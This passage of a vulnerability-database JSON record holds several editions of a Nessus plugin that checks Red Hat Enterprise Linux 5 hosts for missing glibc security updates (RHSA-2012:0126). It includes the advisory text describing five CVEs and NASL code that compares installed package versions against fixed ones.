(RPC) implementation in glibc. A remote attacker able to open a large number of connections to an RPC service that is using the RPC implementation from glibc, could use this flaw to make that service use an excessive amount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu Security Team acknowledges Dan Rosenberg as the original reporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.", "edition": 1, "hash": "f0c1c20f29d3a9c25f7e64d6bdfdf872ab70189d5de703b086bf089067ac5a0c", "hashmap": [{"hash": "ad75a1683f957f79029a294f280f3834", "key": "sourceData"}, {"hash": "5a5a54611766f3da3ce3cb528f3027a4", "key": "references"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6f8115c44826ba13de903bb0d26a7d5b", "key": "cvelist"}, {"hash": "7962711bd7650e97eb287d800fd6fd3a", "key": "description"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2c579aa4e476f52de92baf9b41b1db07", "key": "title"}, {"hash": "7c885de43ac8c8fec677c5a50f1ca9e9", "key": "published"}, {"hash": "3b4231700df65bd1e280187eabbb0395", "key": "pluginID"}, {"hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9", "key": "cvss"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "de38beaee21e66bc5dbf54f5a2409885", "key": "modified"}, {"hash": "c4f16ed276157b63b39f28c10395355d", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=57929", "id": "REDHAT-RHSA-2012-0126.NASL", "lastseen": "2016-09-26T17:23:08", "modified": "2014-11-17T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.2", "pluginID": "57929", "published": "2012-02-14T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2012-0126.html", "https://www.redhat.com/security/data/cve/CVE-2011-4609.html", "https://www.redhat.com/security/data/cve/CVE-2011-1089.html", "https://www.redhat.com/security/data/cve/CVE-2010-0830.html", "https://www.redhat.com/security/data/cve/CVE-2009-5029.html", "https://www.redhat.com/security/data/cve/CVE-2009-5064.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0126. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57929);\n script_version (\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2014/11/17 20:04:01 $\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46740, 50898, 51439);\n script_osvdb_id(65077, 74278, 74883, 77508, 78316);\n script_xref(name:\"RHSA\", value:\"2012:0126\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2012:0126)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5029.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5064.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-0830.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-1089.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-4609.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2012-0126.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2014 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n}\n", "title": "RHEL 5 : glibc (RHSA-2012:0126)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:23:08"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-headers"], "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple programs on the system. These packages contain the standard C and the standard math libraries. Without these two libraries, a Linux system cannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library read timezone files. If a carefully-crafted timezone file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked libraries. If an attacker could trick a user into running ldd on a malicious binary, it could result in arbitrary code execution with the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library loaded ELF (Executable and Linking Format) files. If a carefully-crafted ELF file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount helper utilities, did not handle certain errors correctly when updating the mtab (mounted file systems table) file. If such utilities had the setuid bit set, a local attacker could use this flaw to corrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC) implementation in glibc. A remote attacker able to open a large number of connections to an RPC service that is using the RPC implementation from glibc, could use this flaw to make that service use an excessive amount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu Security Team acknowledges Dan Rosenberg as the original reporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.", "edition": 7, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "bc1b07386c4ebe028ae7faf5924a6b729cc27b2f35f73ce0132026cc3621dd81", "hashmap": [{"hash": "7dd1d3f0577cd1e5fd960493c5598946", "key": "sourceData"}, {"hash": "5a5a54611766f3da3ce3cb528f3027a4", "key": "references"}, {"hash": "ae0665ae2f88d638e0907d932dfcc493", "key": "cpe"}, {"hash": "6f8115c44826ba13de903bb0d26a7d5b", "key": "cvelist"}, {"hash": "7962711bd7650e97eb287d800fd6fd3a", "key": "description"}, {"hash": "8825cfcc6a68eb22807158b2fdce98f8", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2c579aa4e476f52de92baf9b41b1db07", "key": "title"}, {"hash": "7c885de43ac8c8fec677c5a50f1ca9e9", "key": "published"}, {"hash": "3b4231700df65bd1e280187eabbb0395", "key": "pluginID"}, {"hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c4f16ed276157b63b39f28c10395355d", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=57929", "id": "REDHAT-RHSA-2012-0126.NASL", "lastseen": "2018-09-01T23:33:21", "modified": "2018-07-25T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "57929", "published": "2012-02-14T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2012-0126.html", "https://www.redhat.com/security/data/cve/CVE-2011-4609.html", "https://www.redhat.com/security/data/cve/CVE-2011-1089.html", "https://www.redhat.com/security/data/cve/CVE-2010-0830.html", "https://www.redhat.com/security/data/cve/CVE-2009-5029.html", "https://www.redhat.com/security/data/cve/CVE-2009-5064.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0126. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57929);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2018/07/25 18:58:06\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46740, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0126\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2012:0126)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5029.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5064.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-0830.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-1089.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-4609.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2012-0126.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0126\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n }\n}\n", "title": "RHEL 5 : glibc (RHSA-2012:0126)", "type": "nessus", "viewCount": 6}, "differentElements": ["references", "modified", "sourceData"], "edition": 7, "lastseen": "2018-09-01T23:33:21"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-headers"], "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple programs on the system. These packages contain the standard C and the standard math libraries. Without these two libraries, a Linux system cannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library read timezone files. If a carefully-crafted timezone file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked libraries. If an attacker could trick a user into running ldd on a malicious binary, it could result in arbitrary code execution with the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library loaded ELF (Executable and Linking Format) files. If a carefully-crafted ELF file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount helper utilities, did not handle certain errors correctly when updating the mtab (mounted file systems table) file. If such utilities had the setuid bit set, a local attacker could use this flaw to corrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC) implementation in glibc. A remote attacker able to open a large number of connections to an RPC service that is using the RPC implementation from glibc, could use this flaw to make that service use an excessive amount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu Security Team acknowledges Dan Rosenberg as the original reporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.", "edition": 3, "enchantments": {"score": {"modified": "2017-10-29T13:33:18", "value": 6.9}}, "hash": "ac5caa4623a6837410dc5754ac7267ce4e0615b9818ccfa656c6599ea90db332", "hashmap": [{"hash": "5a5a54611766f3da3ce3cb528f3027a4", "key": "references"}, {"hash": "b7f00b70496e4f2268229628988b3711", "key": "sourceData"}, {"hash": "ae0665ae2f88d638e0907d932dfcc493", "key": "cpe"}, {"hash": "369eb856f7dc4cfd31b9acc3c0811267", "key": "modified"}, {"hash": "6f8115c44826ba13de903bb0d26a7d5b", "key": "cvelist"}, {"hash": "7962711bd7650e97eb287d800fd6fd3a", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2c579aa4e476f52de92baf9b41b1db07", "key": "title"}, {"hash": "7c885de43ac8c8fec677c5a50f1ca9e9", "key": "published"}, {"hash": "3b4231700df65bd1e280187eabbb0395", "key": "pluginID"}, {"hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c4f16ed276157b63b39f28c10395355d", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=57929", "id": "REDHAT-RHSA-2012-0126.NASL", "lastseen": "2017-10-29T13:33:18", "modified": "2017-01-05T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "57929", "published": "2012-02-14T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2012-0126.html", "https://www.redhat.com/security/data/cve/CVE-2011-4609.html", "https://www.redhat.com/security/data/cve/CVE-2011-1089.html", "https://www.redhat.com/security/data/cve/CVE-2010-0830.html", "https://www.redhat.com/security/data/cve/CVE-2009-5029.html", "https://www.redhat.com/security/data/cve/CVE-2009-5064.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0126. The text \n# itself is copyright (C) 